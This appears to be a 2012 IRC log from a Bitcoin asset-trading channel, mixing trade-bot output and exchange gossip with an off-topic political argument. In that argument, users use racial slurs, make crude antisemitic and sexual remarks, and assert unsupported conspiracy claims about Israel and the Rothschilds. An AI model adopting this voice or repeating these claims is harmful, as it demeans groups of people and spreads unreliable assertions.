21 17:46:16 [GLBSE] [OBSI.HRPT] 2 @ 0.09799998 = 0.196 BTC [+] Sep 21 17:46:17 [GLBSE] [OBSI.HRPT] 8 @ 0.098 = 0.784 BTC [+] Sep 21 17:46:27 what i would like to do is buy a print of the goat boat and have it signed and pay in btc :) Sep 21 17:47:48 [GLBSE] [OBSI.HRPT] 34 @ 0.09799999 = 3.332 BTC [-] Sep 21 17:47:49 [GLBSE] [OBSI.HRPT] 16 @ 0.098 = 1.568 BTC [+] Sep 21 17:48:48 [GLBSE] [GIGAMINING] 2 @ 0.67 = 1.34 BTC [-] Sep 21 17:52:35 see Sep 21 17:52:37 you know what I want? Sep 21 17:52:42 to be able to tell my computer Sep 21 17:52:45 GOOGLE Sep 21 17:52:47 and it does Sep 21 17:55:26 [GLBSE] [OBSI.HRPT] 25 @ 0.0983 = 2.4575 BTC [+] Sep 21 17:55:28 [GLBSE] [OBSI.HRPT] 11 @ 0.0984 = 1.0824 BTC [+] Sep 21 17:55:31 welcome to 1995 Diablo-D3 Sep 21 17:56:08 one day kakobreklaaa is going to be known as janedoe or something and it will blow all our minds. Sep 21 17:57:30 minds blown. Sep 21 17:57:50 hurr Sep 21 17:58:11 [GLBSE] [OBSI.HRPT] 50 @ 0.0985 = 4.925 BTC [+] Sep 21 17:58:12 durr Sep 21 17:58:21 smoocious how did you download it? Sep 21 17:58:30 curl -O Sep 21 17:58:35 or wget Sep 21 17:58:47 umm in in windows 7 on firefox Sep 21 17:58:47 or if you're on windows Sep 21 17:58:53 you format your computer, then install linux Sep 21 17:58:53 im* Sep 21 17:59:00 and then type curl -O lol thanks copumpkin Sep 21 17:59:08 anytime :) Sep 21 17:59:12 [GLBSE] [OBSI.HRPT] 50 @ 0.0986 = 4.93 BTC [+] Sep 21 17:59:22 can you email me the file? Sep 21 17:59:29 awesome :) Sep 21 18:00:08 [GLBSE] [OBSI.HRPT] 50 @ 0.0987 = 4.935 BTC [+] Sep 21 18:01:15 copumpkin that was an elegant solution for using curl Sep 21 18:01:22 probably the best i've seen Sep 21 18:01:49 I'm pretty l33t Sep 21 18:02:00 no wai Sep 21 18:02:14 btw, Chaang-Noi, I got doxed the other day Sep 21 18:02:25 yeah, my dox were amazingly revealing Sep 21 18:02:29 sorry copumpkin Sep 21 18:02:49 im not seen them, nor do i care to see them Sep 21 18:02:59 nah, I was just being sarcastic Sep 21 18:03:02 it was voluntary doxing Sep 21 18:03:04 oh okay Sep 21 18:03:06 and there's absolutely nothing on them Sep 21 18:03:11 I was kinda disappointed actually Sep 21 18:03:20 they did have a list of addresses I've lived at in the past few years Sep 21 18:03:44 they note that my SSN is from MD (which is amusing because I've never lived there) Sep 21 18:03:50 they have my birthyear and month Sep 21 18:03:55 and that's about it :P Sep 21 18:04:12 i have nothing secret to hide on me copumpkin Sep 21 18:04:17 some people have already doxed me Sep 21 18:04:23 hell i did it myself Sep 21 18:04:31 one hour smoovious Sep 21 18:04:41 [GLBSE] [YABMC] 9 @ 0.091 = 0.819 BTC [+] Sep 21 18:04:43 [GLBSE] [YABMC] 4 @ 0.0915 = 0.366 BTC [+] Sep 21 18:04:51 :) Sep 21 18:05:14 I dunno, I was hoping for some juicy bits on my sealed dealings with the law as a minor Sep 21 18:05:15 but no! Sep 21 18:05:25 there is no record of that hooker Sep 21 18:06:31 what hooker? Sep 21 18:06:42 did nefario kill another hooker again? Sep 21 18:06:47 nah, I did Sep 21 18:06:53 but the records were sealed Sep 21 18:06:55 so I'm good Sep 21 18:07:12 I've been good ever since I turned 18 Sep 21 18:07:23 well, except... Sep 21 18:07:36 well, let's just think the legal system thinks I've been good ever since I turned 18 Sep 21 18:07:47 [GLBSE] [NYAN.B] 3 @ 1.0001 = 3.0003 BTC [-] Sep 21 18:07:48 [GLBSE] [NYAN.B] 1 @ 1.00000003 BTC [-] Sep 21 18:07:50 [GLBSE] [NYAN.B] 3 @ 1.00000002 = 3 BTC [-] Sep 21 18:08:08 perhaps I shouldn't joke about shit like that here Sep 21 18:08:22 with the level of insanity on the forums, I'm sure there'll be a dozen threads about it by tomorrow Sep 21 18:08:39 oh yes Sep 21 18:09:16 iv never been in a place where my insaity is somewhat normal Sep 21 18:09:40 copumpkin is 15. Sep 21 18:09:56 hahha Sep 21 18:10:20 sorry i'm not laughing at you, i'm alughing at this youtube video of sarah silverman Sep 21 18:10:29 then random bitcoin thugs might show up and annoy my doorman Sep 21 18:10:31 she has a hilaroius video on voter fraud Sep 21 18:11:10 copumpkin is also black Sep 21 18:11:14 in addition to being 15 Sep 21 18:11:15 I am? Sep 21 18:11:18 oh nice Sep 21 18:11:18 yes Sep 21 18:11:21 bitcoin thugs? Sep 21 18:11:24 lol what? Sep 21 18:11:27 I really lack a lot of introspection Sep 21 18:11:29 uhm. good morning. I just woke up. now this. Sep 21 18:11:34 so many things about myself I did not realize Sep 21 18:11:42 "bitcoin thugs" sounds awesome Sep 21 18:11:47 totally understandable copumpkin Sep 21 18:11:49 bithugs Sep 21 18:11:53 is that bit-hugs Sep 21 18:11:56 or bit-thugs? Sep 21 18:11:58 sometimes we just do not know our true selves Sep 21 18:12:02 is that like. regular thugs who take payment over silk road? Sep 21 18:12:06 Smoovious: n00b Sep 21 18:12:10 it's Bitcoin, not BitCoin Sep 21 18:12:28 I can CamelCase words if I want to Sep 21 18:12:34 CamelToe? Sep 21 18:12:37 Bitty Coins Sep 21 18:12:39 [GLBSE] [GSDPT] 10 @ 0.00337 = 0.0337 BTC [-] Sep 21 18:12:40 [GLBSE] [GSDPT] 490 @ 0.003365 = 1.6489 BTC [-] Sep 21 18:12:44 did someone say tits? Sep 21 18:12:49 http://en.wikipedia.org/wiki/CamelCase Sep 21 18:12:50 I said CamelToe Sep 21 18:12:53 Diablo-D3: me Sep 21 18:13:05 it seems appropriate to spell it that way Sep 21 18:14:19 [GLBSE] [OBSI.HRPT] 1 @ 0.0988 BTC [+] Sep 21 18:14:56 [GLBSE] [RSM] 1 @ 0.291 BTC [-] Sep 21 18:14:57 [GLBSE] [RSM] 2 @ 0.291 = 0.582 BTC [-] Sep 21 18:17:02 [MPEX] [F.GIGA.ETF] 7324 @ 0.000301 = 2.2045 BTC [+] Sep 21 18:17:03 [MPEX] [F.GIGA.ETF] 1376 @ 0.00029805 = 0.4101 BTC [-] Sep 21 18:18:30 [GLBSE] [MOORE] 1 @ 0.5 BTC [-] Sep 21 18:22:46 is the image legit? Sep 21 18:22:54 did you find the tubgirl tile? Sep 21 18:23:12 [GLBSE] [GOLD] 200 @ 0.00975 = 1.95 BTC [-] Sep 21 18:23:13 [GLBSE] [GOLD] 50 @ 0.0095 = 0.475 BTC [-] Sep 21 18:27:32 try imagej Sep 21 18:27:52 or fiji Sep 21 18:28:13 [GLBSE] [ASICMINER] 10 @ 0.1241 = 1.241 BTC [+] Sep 21 18:28:15 [GLBSE] [ASICMINER] 1 @ 0.124 BTC [-] **** BEGIN LOGGING AT Sat Sep 22 02:51:58 2012 Sep 22 03:04:42 [GLBSE] [FPGAMINING] 5 @ 0.36030003 = 1.8015 BTC [+] Sep 22 03:11:22 "I tried finding information about the london conf, pictures, video, anything... and failed." Sep 22 03:11:27 seriously, was anyone actually there ? Sep 22 03:11:59 didn't nefario say he was there Sep 22 03:12:00 ? Sep 22 03:12:19 a ok. Sep 22 03:12:30 and nefario is involved in bitcoin because he runs the main bitcoin scam site. Sep 22 03:12:41 it being in london, i kinda forgotit was happening Sep 22 03:13:08 seriously tho, have a conference and there's not a fucking blogpost anywhere about it ? Sep 22 03:13:16 even the romanians manage better than that. Sep 22 03:13:46 who was organizing it? Sep 22 03:14:02 [MPEX] [F.GIGA.ETF] 5600 @ 0.00030358 = 1.7 BTC [-] Sep 22 03:14:04 [MPEX] [F.GIGA.ETF] 8800 @ 0.0002997 = 2.6374 BTC [-] Sep 22 03:14:05 [MPEX] [F.GIGA.ETF] 1600 @ 0.00029487 = 0.4718 BTC [-] Sep 22 03:14:07 didn't they get wrapped in a scandal and stop, but "we" had the confrence anyway? Sep 22 03:15:23 well, intersango guys (taaki, stateman, the other guy) + nefario were organising it. Sep 22 03:15:33 then the first three turned out somewhere in the doubtfull to scammer continuum Sep 22 03:15:41 so now nefario isn't admitting he works for (not with) them Sep 22 03:16:07 mircea_popescu: we never went to the moon, it's a hoax Sep 22 03:16:13 you never did. Sep 22 03:16:18 I don't actually exist Sep 22 03:16:20 just a bot Sep 22 03:16:26 and incidentally, it occurs to me i still don't see your connection to bitcoin. Sep 22 03:16:29 you're a ven developer. Sep 22 03:18:01 but anyway : https://bitcointalk.org/index.php?topic=110805.msg1209746#msg1209746 prolly sjhould answer the guy. Sep 22 03:18:17 guys, it's just me here it seems, no need for the tit for tat Sep 22 03:30:52 <__Atlas__> Ven... Sep 22 03:31:05 <__Atlas__> I don't see Ven doing well in 2013 with food shortages. Sep 22 03:31:09 <__Atlas__> Nope, not one bit. Sep 22 03:31:26 <__Atlas__> Bitcoin? Junkies will still be junkies. Sep 22 03:32:07 Yeah I'm dropping ven Sep 22 03:32:13 for different reasons Sep 22 03:32:35 can you drop a bluechip asset ?! Sep 22 03:33:00 it's not been put on sale Sep 22 03:33:05 since I'm the issuer Sep 22 03:33:05 yes Sep 22 03:33:24 nefario: looks like I may buy METAL & METAL.SILVER is the transfer to my account easy, or should I just have him send login details and change the pass? Sep 22 03:33:38 [GLBSE] [FPGA.CONTRACT] 2 @ 0.073 = 0.146 BTC [+] Sep 22 03:33:41 eh? Sep 22 03:34:12 I will be buying the assets, are you able to put them under my umbrella account or do I need to use his? Sep 22 03:34:19 the assets as a whole Sep 22 03:34:48 you're going to buy them all? Sep 22 03:35:02 I'm going to become the asset issuer for them Sep 22 03:35:47 ok Sep 22 03:38:50 [GLBSE] [YABMC] 2 @ 0.0908 = 0.1816 BTC [+] Sep 22 03:39:00 [GLBSE] [OBSI.HRPT] 17 @ 0.08952001 = 1.5218 BTC [-] Sep 22 03:39:01 [GLBSE] [OBSI.HRPT] 4 @ 0.08952 = 0.3581 BTC [-] Sep 22 03:40:04 [MPEX] [F.GIGA.ETF] 2300 @ 0.00029487 = 0.6782 BTC [-] Sep 22 03:40:06 [MPEX] [S.MPOE] 1800 @ 0.00038598 = 0.6948 BTC [-] Sep 22 03:40:07 [MPEX] [S.MPOE] 23632 @ 0.00038584 = 9.1182 BTC [-] Sep 22 03:41:20 [GLBSE] [OBSI.HRPT] 14 @ 0.08800001 = 1.232 BTC [-] Sep 22 03:41:21 [GLBSE] [OBSI.HRPT] 98 @ 0.088 = 8.624 BTC [-] Sep 22 03:50:24 Soooo. Obsi gonna pay the divvy? Sep 22 03:50:36 divvy? Sep 22 03:51:07 yo! Sep 22 03:52:03 [MPEX] [O.BTCUSD.C090T] 739 @ 0.32735338 = 241.9141 BTC [+] Sep 22 03:52:05 [MPEX] [O.BTCUSD.C080T] 900 @ 0.42446177 = 382.0156 BTC [+] Sep 22 03:52:32 [GLBSE] [BBBB] 204 @ 0.00019 = 0.0388 BTC [-] Sep 22 03:52:56 oh itts paid Sep 22 03:53:08 small one this time Sep 22 03:53:25 wtf Sep 22 03:53:28 I can maths Sep 22 03:53:44 .00049996? Sep 22 03:53:56 yeah was supposed to be 0.0005 Sep 22 03:54:02 oh well Sep 22 04:00:02 <__Atlas__> Would you guys be willing to speculate on American Confederate dollars from the late 1800s? Sep 22 04:01:16 if you have physical bills (either dollars or bonds) Sep 22 04:01:23 i'd be interested from a collector's perspective. Sep 22 04:01:50 <__Atlas__> I would probably stick to paper Sep 22 04:02:04 Obsi what's your float on .hrpt ? i mean, the 10bn glbbq lists minus whatever you hold in treasury ? Sep 22 04:02:19 <__Atlas__> Smoovious: a minimum grade would be accepted into the pool, yes Sep 22 04:02:45 <__Atlas__> As for redeeming a GLBSE confederate dollar for a real one Sep 22 04:02:49 <__Atlas__> It would be luck of the draw Sep 22 04:02:59 not sure what you mean mircea_popescu, can you clarify? Sep 22 04:03:25 glbse lists obsi.hrpt as having issued 100k shares i think ? presumably not all those were sold, you still hold some. Sep 22 04:03:36 what is your float ? how many shares are out there in the hands of people other than yourself Sep 22 04:03:51 Donate Bitcoins to the cause of Anonymous! http://pastebin.com/r56SVjBs Sep 22 04:03:57 it lists in the dividend table, I think it is 50,536 Sep 22 04:04:15 aha Sep 22 04:04:18 ty Sep 22 04:06:36 [GLBSE] [PPT.A] 100 @ 0.32 = 32 BTC [+] Sep 22 04:07:35 [GLBSE] [PPT.B] 80 @ 0.32 = 25.6 BTC [+] Sep 22 04:10:04 [MPEX] [S.MPOE] 12200 @ 0.00038712 = 4.7229 BTC [+] Sep 22 04:10:06 [MPEX] [S.MPOE] 31400 @ 0.00038872 = 12.2058 BTC [+] Sep 22 04:10:07 [MPEX] [S.MPOE] 5788 @ 0.00038872 = 2.2499 BTC [+] Sep 22 04:10:07 "Please tell me what's too good to be true? 4-5 different competitors have all announced ASICs, and they're all within similar performance and price ranges." Sep 22 04:10:08 [MPEX] [S.MPOE] 36800 @ 0.00038908 = 14.3181 BTC [+] Sep 22 04:10:08 [MPEX] [S.MPOE] 6388 @ 0.00038988 = 2.4906 BTC [+] Sep 22 04:10:09 [MPEX] [S.MPOE] 6000 @ 0.00038996 = 2.3398 BTC [+] Sep 22 04:10:10 [MPEX] [S.MPOE] 10149 @ 0.00039029 = 3.9611 BTC [+] Sep 22 04:10:11 [MPEX] [S.MPOE] 33846 @ 0.00039162 = 13.2548 BTC [+] Sep 22 04:10:12 [MPEX] [S.MPOE] 19100 @ 0.0003921 = 7.4891 BTC [+] Sep 22 04:10:13 [MPEX] [S.MPOE] 25000 @ 0.00039451 = 9.8628 BTC [+] Sep 22 04:10:14 [MPEX] [S.MPOE] 39800 @ 0.00039469 = 15.7087 BTC [+] Sep 22 04:10:15 [MPEX] [S.MPOE] 39700 @ 0.00039899 = 15.8399 BTC [+] Sep 22 04:10:17 [MPEX] [S.MPOE] 50000 @ 0.000415 = 20.75 BTC [+] Sep 22 04:10:18 [MPEX] [S.MPOE] 50000 @ 0.000416 = 20.8 BTC [+] Sep 22 04:10:18 [MPEX] [S.MPOE] 15829 @ 0.00041632 = 6.5899 BTC [+] Sep 22 04:10:23 people seem to not be able to comprehend that the reason 4-5 people announced asics is that... 4-5 people announced asics. Sep 22 04:10:34 social media and it's pernicious effects still isn't comprehended in general. Sep 22 04:18:52 ;;ident Bugpowder Sep 22 04:18:53 Nick 'Bugpowder', with hostmask 'Bugpowder!47ab6a02@gateway/web/freenode/ip.71.171.106.2', is not identified. Sep 22 04:20:02 dude you need me to gpg that shit up? Sep 22 04:20:54 [GLBSE] [OBSI.HRPT] 6 @ 0.08900001 = 0.534 BTC [+] Sep 22 04:21:24 [GLBSE] [OBSI.HRPT] 19 @ 0.089 = 1.691 BTC [-] Sep 22 04:24:33 !ticker obsi.hrpt Sep 22 04:24:48 [GLBSE:OBSI.HRPT] [Bid: 0.08900001] [Ask: 0.09447999] [Spread: 0.00547998] [Last: 0.089] [24hVol: 279.61173141] [7dAvg: 0.09946976] Sep 22 04:25:37 [GLBSE] [OBSI.HRPT] 18 @ 0.089 = 1.602 BTC [-] Sep 22 04:25:38 [GLBSE] [OBSI.HRPT] 2 @ 0.088 = 0.176 BTC [-] Sep 22 04:25:39 [GLBSE] [OBSI.HRPT] 1 @ 0.0863 BTC [-] Sep 22 04:26:54 [GLBSE] [OBSI.HRPT] 2 @ 0.08620001 = 0.1724 BTC [-] Sep 22 04:26:55 [GLBSE] [OBSI.HRPT] 99 @ 0.0862 = 8.5338 BTC [-] Sep 22 04:27:11 hold on ter yur butts Sep 22 04:27:32 whats going on now Sep 22 04:28:08 iirc, the dinosaurs escape now Sep 22 04:28:33 I am sick of all these mofo dinos all over this mofo island Sep 22 04:28:55 [GLBSE] [OBSI.HRPT] 37 @ 0.085 = 3.145 BTC [-] Sep 22 04:28:57 that line was ahead of its time, and no one seems to remember it Sep 22 04:29:44 <__Atlas__> Is Bitcoin a seller's market or a buyer's market? Sep 22 04:30:00 __Atlas__ seller. Sep 22 04:30:14 Did nef say he wasn't approving any more assets by us unknown folk? Sep 22 04:30:28 no, nef said hes going to steal all the money and run with it Sep 22 04:30:48 maybe we can pick up the bitcoins that fall from his pockets as he runs Sep 22 04:30:48 Obsi: approval of assets has been moved to a board Sep 22 04:30:54 I don't decide anymore Sep 22 04:31:04 well Sep 22 04:31:05 sounds boaring Sep 22 04:31:08 [GLBSE] [OBSI.HRPT] 4 @ 0.089 = 0.356 BTC [+] Sep 22 04:31:09 it is Sep 22 04:31:10 I imagine Sep 22 04:31:18 I'd like to start a METAL.COPPER Sep 22 04:31:18 I don't know since it's removed it from me Sep 22 04:31:28 I wish I had a planking joke to go with this Sep 22 04:31:29 talk to ColdHardMetal Sep 22 04:31:35 he can give you better advice than me Sep 22 04:31:35 how to bribe board pls? Sep 22 04:31:37 I just run GLBSE Sep 22 04:31:47 [GLBSE] [OBSI.HRPT] 11 @ 0.085 = 0.935 BTC [-] Sep 22 04:32:00 nefario: but have you moved shutting down assets to the board? Sep 22 04:32:00 Obsi: you make me want to make a bad joke Sep 22 04:32:05 also, whos on the board? Sep 22 04:32:05 do eet Sep 22 04:32:31 2000 btc Sep 22 04:33:09 [GLBSE] [OBSI.HRPT] 3 @ 0.08499999 = 0.255 BTC [-] Sep 22 04:33:17 ofcourse, it's the context taht makes it funny Sep 22 04:34:36 <__Atlas__> Smoovious: There's now a 5 BTC application fee Sep 22 04:36:03 [MPEX] [F.GIGA.ETF] 5200 @ 0.00029487 = 1.5333 BTC [-] Sep 22 04:37:05 Smoovious: and then a 7BTC listing fee if your application is approved Sep 22 04:37:08 total 12BTC Sep 22 04:37:12 if not approved Sep 22 04:37:17 you get 7BTC listing fee back Sep 22 04:37:34 How many people on board? Sep 22 04:37:51 12 btc? that still went up Sep 22 04:38:41 Up? that's less than mpoe.etf paid Sep 22 04:39:24 smickles: er? Sep 22 04:39:30 <__Atlas__> I am very sad that the rest of the Breaking Bad season isn't coming out until next year Sep 22 04:39:31 I remember paying 8btc for DMC Sep 22 04:39:35 whats the listing fee for mpex? Sep 22 04:39:47 mpex still charges 20btc to just trade there Sep 22 04:39:50 which is absurd Sep 22 04:39:55 Diablo-D3: mpoe.etf started when it was 20btc, v1 Sep 22 04:40:02 smickles: wow, thats insane Sep 22 04:40:12 its not like glbse is a real stock market Sep 22 04:40:14 <__Atlas__> Diablo-D3: There's a lot of profit to be made in the options market Sep 22 04:40:19 theres no facebooks here for nefario to fuck up Sep 22 04:40:20 yet, anyways Sep 22 04:40:27 nefario: the listing fee for mpex is not set, it's agreed to during the process of listing Sep 22 04:40:31 __Atlas__: no one gives a fuck about options Sep 22 04:40:48 Diablo-D3: if it's a real stock market, then it must be regulated by the romanian financial regulator right? Sep 22 04:41:00 romanian? Sep 22 04:41:02 smickles: so you make a deal then Sep 22 04:41:06 or Sep 22 04:41:27 if mpex is based on US servers it needs to be regulated by the SEC if it's a real stock market Sep 22 04:41:31 <__Atlas__> I don't even think Romania has a functioning government. Sep 22 04:41:42 __Atlas__ how's that a bad thing ? Sep 22 04:41:52 <__Atlas__> It's not. ; ) Sep 22 04:42:04 nefario i've been perusing with much amusement your summaries of discussions with "lawyers" Sep 22 04:42:06 stick to ven. Sep 22 04:42:43 mircea_popescu: you can probably answer the question of the charge to list on mpex better than i can Sep 22 04:42:44 do you have lawyers in Romania? Sep 22 04:42:56 no, i have lawyers in us. and the uk. Sep 22 04:43:00 that'd be the difference between us. Sep 22 04:43:03 smickles shoot ? Sep 22 04:43:33 what does it cost to list an asset on mpex? it varies, right? Sep 22 04:44:02 <__Atlas__> http://www.youtube.com/watch?v=YPR9ORpwBEU Sep 22 04:44:06 yes, it's something negotiated with each issuer. Sep 22 04:44:54 does romania even exist? Sep 22 04:45:06 I swear the US government just makes up countries Sep 22 04:45:36 like israel... "the land of the jews" in the middle of a muslim shithole Sep 22 04:45:37 srsly? Sep 22 04:45:52 Smoovious: I thought obama said 58 Sep 22 04:46:01 <__Atlas__> Diablo-D3: That was more intentional than they want you to believe. Sep 22 04:46:26 Im surprised romney hasnt brought that up Sep 22 04:46:42 I mean, he meant to say 48 since he cant visit alaska and hawaii due to the tight campaign schedule Sep 22 04:46:54 <__Atlas__> Romney has pretty much given Israel a marriage proposal. Sep 22 04:46:58 but HURRRR LYING KENYAN DERP DERP DERP Sep 22 04:47:03 __Atlas__: and a hand job Sep 22 04:47:22 nefario: Comisia Nationala a Valorilor Mobiliare Sep 22 04:47:23 for a morman, he loves rich and powerful jewish men Sep 22 04:47:53 their... money... and... their.... cut penises.... oh God..... someone get me a towel Sep 22 04:48:20 ugh, someone get be a bucket, I'm going to puke Sep 22 04:48:30 Smoovious: its not israel's fault Sep 22 04:48:36 they're a product of broken US foreign relations Sep 22 04:48:51 <__Atlas__> Smoovious: I don't you've seen the Palestenian slums Sep 22 04:48:55 <__Atlas__> and the starvation Sep 22 04:49:01 Smoovious: you do know how israel was created, right? Sep 22 04:49:06 <__Atlas__> and the genocide Sep 22 04:49:18 <__Atlas__> Israel is pretty much the Third Reich in reverse Sep 22 04:49:22 shortly after WW2, to "help" the displaced german jews that ran back to their biblical homeland... Sep 22 04:49:29 we created a nation out of nothing Sep 22 04:49:35 _we_ _created_ it. Sep 22 04:49:44 Diablo-D3 romania existed much before there was an england. Sep 22 04:49:46 let alone an us. Sep 22 04:49:47 <__Atlas__> Technically the Rothschilds financed most of it. Sep 22 04:49:50 its not the israel of the bible. it is a new nation founded out of nothing from stolen land. Sep 22 04:50:03 I dont blame every muslim country being in an uproar Sep 22 04:50:04 <__Atlas__> The Rothschild family owns 70% or more of the land in Israel. Sep 22 04:50:10 __Atlas__: thats beside the point Sep 22 04:50:21 Smoovious: yeah, but the muslims wont let it go Sep 22 04:50:30 <__Atlas__> Smoovious: We're talking decades now and there are still slums and killings. Sep 22 04:50:31 no one who was apart of this are even alive Sep 22 04:50:32 smickles what about teh CNVM ? Sep 22 04:50:36 it's like the sec, in ro Sep 22 04:50:38 the "greatest generation" are almost all dead Sep 22 04:50:50 its time to let it go Sep 22 04:50:55 <__Atlas__> The Israelis actually limit the food going into Gaza Sep 22 04:50:57 mircea_popescu: nef was asking about the sec of romania Sep 22 04:51:01 o Sep 22 04:51:02 <__Atlas__> They intentionally starve these people. Sep 22 04:51:29 that make me hungry Sep 22 04:51:29 look at the entire arab sphere... do you know what country has the most muslims in positions of power, either politically or in business? israel. Sep 22 04:51:36 __Atlas__ much like the new us federal mandates on school lunches ? Sep 22 04:51:37 seriously, read what I wrote three times Sep 22 04:51:49 if you're muslim, the safest country to live in over there is israel Sep 22 04:51:54 <__Atlas__> Smoovious: That's a load of shit. The Gaza strip and other Pal. lands get smaller and smaller. Sep 22 04:51:54 Diablo-D3 nah, the saudis. Sep 22 04:51:55 i'm going to needlessly eat som more food Sep 22 04:51:58 you dont have your own government trying to kill you Sep 22 04:52:00 mircea_popescu: I said most Sep 22 04:52:04 mircea_popescu: not most powerful Sep 22 04:52:12 so most as in hwat,. headcount ? Sep 22 04:52:17 headcount. Sep 22 04:52:18 as a % its still the saudis Sep 22 04:52:22 e well fuck headcount lol Sep 22 04:52:31 mayors, police, teachers, etc Sep 22 04:52:34 [GLBSE] [OBSI.HRPT] 25 @ 0.084 = 2.1 BTC [-] Sep 22 04:52:37 muslims and jews live and work side by side Sep 22 04:52:45 <__Atlas__> I guess it would be acceptable for Native Americans to force all of the current US citizens into one plot of land. Sep 22 04:52:49 <__Atlas__> And slowly starve them Sep 22 04:52:55 <__Atlas__> That's just how war should be after all. Sep 22 04:53:01 __Atlas__: yes, and I wouldnt blame them Sep 22 04:53:17 i would blame them, Sep 22 04:53:31 every white man who was born in the US should feel shame for what our ancestors did Sep 22 04:53:38 bs Sep 22 04:53:42 <__Atlas__> Ugh, you know, you guys go ahead and get fucked in the ass. I'll defend where I stand to the death regardless of history. Sep 22 04:53:52 __Atlas__: thats the thing Sep 22 04:54:05 fighting isnt the answer Sep 22 04:54:06 never was Sep 22 04:54:18 <__Atlas__> Yes, I should just listen to the higher powers Sep 22 04:54:21 <__Atlas__> and get fucked over Sep 22 04:54:33 <__Atlas__> Everybody else uses guns and violence, Diablo-D3. Sep 22 04:54:40 I don't, Atlas. Sep 22 04:54:44 <__Atlas__> There is no winning just letting yourself get pushed around. Sep 22 04:54:54 I never said get pushed around. Sep 22 04:55:01 They simply have nothing they can threaten me with. Sep 22 04:55:08 there is no winning because it isn't a game :/ Sep 22 04:55:27 To me, someone like Hitler was just a young child having a temper tantrum Sep 22 04:56:02 Smoovious: african american IS a racist term Sep 22 04:56:06 am I a european american? no Sep 22 04:56:26 there's no european americans Sep 22 04:56:30 Smoovious: you can choose to not continue it Sep 22 04:56:31 you're all niggers from the colonies. Sep 22 04:56:48 i'm a decendant of the first govenor of plymouth iirc Sep 22 04:56:52 I dunno, maybe I really should just start a religion Sep 22 04:57:16 Smoovious: neither do I Sep 22 04:57:18 ooh ya'll are chatting it up Sep 22 04:57:20 (plymouth 'merica, that is) Sep 22 04:57:23 if you're human, you're one of us. Sep 22 04:57:24 smickles :p Sep 22 04:57:26 let me read my buffer and get caught up Sep 22 04:57:33 jcpham o hay. your mom. Sep 22 04:57:58 I dont get the point of violence, it solves nothing. Sep 22 04:57:59 my mommy didn't do it Sep 22 04:58:21 Like, you know whats screwed up? Take the American middle class as the measuring stick of "no one should live worse than this" Sep 22 04:58:23 everything is solved through violence Sep 22 04:58:26 or trade Sep 22 04:58:28 we have enough resources on earth to give that to everyone Sep 22 04:58:31 trade is violence. Sep 22 04:58:42 you know why there are so many shit countries? because we squander the resources Sep 22 04:58:50 currency however prevents violience and encourages trade Sep 22 04:58:57 ironic Sep 22 04:58:59 Smoovious: see, that brings up an interesting thing Sep 22 04:59:11 jcpham just favours one sort of violence over another. Sep 22 04:59:16 martin luther king jr set in motion what allowed obama to become president Sep 22 04:59:21 but he opened another door Sep 22 04:59:22 wtf Sep 22 04:59:25 any white man could become a nigger. Sep 22 04:59:30 is it fbruary Diablo-D3 Sep 22 04:59:41 i mistake the month Sep 22 04:59:43 Ive met people like this Sep 22 04:59:57 And theres nothing you can do for them because they choose to be this way Sep 22 05:00:16 why is everyone saying nigger Sep 22 05:00:22 Diablo-D3: you've just said nothing Sep 22 05:00:33 i'm offended Sep 22 05:00:40 Smoovious: no he didnt Sep 22 05:00:44 he wanted a better country Sep 22 05:00:47 someday we'll get it Sep 22 05:00:56 but people of ALL races must come together and make it happen Sep 22 05:01:00 i taking everyone's names and calling the bitcoin-police Sep 22 05:01:03 right now Sep 22 05:01:03 <__Atlas__> Peace doesn't overthrow governments and tyranny. Never will. Sep 22 05:01:13 Smoovious: he just wanted his own people to stand up and BE people Sep 22 05:01:20 why is this crap relevant to -assets? Sep 22 05:01:30 <__Atlas__> I'm tired of the no-guns, let's all sit down on our asses and everything will be fine attitude. Sep 22 05:01:45 <__Atlas__> No, it will not be fine unless you enjoy labor camps and soylent green. Sep 22 05:01:48 assets is the new channel Sep 22 05:01:52 that was that other channel Sep 22 05:02:01 and before that it was that other channel Sep 22 05:03:32 ya know, i remember being told of my ancestor establishing and signing a peace treaty with the natives Sep 22 05:03:58 they were smart smickles Sep 22 05:04:42 <__Atlas__> How is a peace treaty enforced? Mutually assured destruction. Sep 22 05:05:04 <__Atlas__> It takes a stable market between warring nations in order to have peace. Sep 22 05:05:13 <__Atlas__> You can't have one weaker than the other. Sep 22 05:05:19 <__Atlas__> That never works. Sep 22 05:05:26 __Atlas__: actually, it was 50 years of peace which was broken when outside forces attacked the natives Sep 22 05:05:41 <__Atlas__> >we choose Sep 22 05:05:43 <__Atlas__> >choose Sep 22 05:05:52 Smoovious: no, Ive never seen it Sep 22 05:05:53 <__Atlas__> You still think you have a choice in your government? Sep 22 05:06:59 you sold me at morgan freeman Sep 22 05:07:03 [MPEX] [F.GIGA.ETF] 12100 @ 0.00029349 = 3.5512 BTC [-] Sep 22 05:07:49 <__Atlas__> I will just end this with that you can't have an effective government of anything unless you have a populace that can overthrow it. Sep 22 05:08:01 __Atlas__: I agree. Sep 22 05:08:11 people have to be governed willingly Sep 22 05:08:30 anytime enough people fight being governed, the whole system grinds to a halt Sep 22 05:08:45 [GLBSE] [OBSI.HRPT] 75 @ 0.084 = 6.3 BTC [-] Sep 22 05:08:50 why do you think the US is such a pile of shit? both sides are fighting each other instead of just letting it happen Sep 22 05:09:03 the rich vs the poor Sep 22 05:09:16 Smoovious: no Sep 22 05:09:18 its not red vs blue Sep 22 05:09:21 it really is rich vs poor Sep 22 05:09:32 [GLBSE] [OBSI.HRPT] 1 @ 0.083 BTC [-] Sep 22 05:09:36 the government is lopsided because it caters to the needs of the rich far too often Sep 22 05:09:37 <__Atlas__> Let's just bring the Articles of Confederation back Sep 22 05:09:48 Smoovious: not even Sep 22 05:09:51 <__Atlas__> Diablo-D3: Yes, because who has the power? Sep 22 05:10:01 __Atlas__: the group with the most guns, really. Sep 22 05:10:05 and it isnt the rich Sep 22 05:10:11 <__Atlas__> Guns can be bought Sep 22 05:10:22 not when it comes to a full blown civil war Sep 22 05:10:30 people will protect themselves and their families first Sep 22 05:10:41 <__Atlas__> True. Sep 22 05:10:56 we ARE headed in that direction, and its not something I wish to see Sep 22 05:11:29 [GLBSE] [OBSI.HRPT] 13 @ 0.0801 = 1.0413 BTC [-] Sep 22 05:11:38 <__Atlas__> I like to see the art of war as a market of asks and bids. Sep 22 05:11:48 the government wastes resources because it doesnt understand how to govern itself efficiently Sep 22 05:12:12 Smoovious: yes, but thats just a small part of the bigger picture Sep 22 05:12:29 in YOUR respective camps, maybe Sep 22 05:12:33 I subscribe to neither party Sep 22 05:12:34 The thing is that we (people) are very much in tune with taking sides and joining forces against the "enemy". 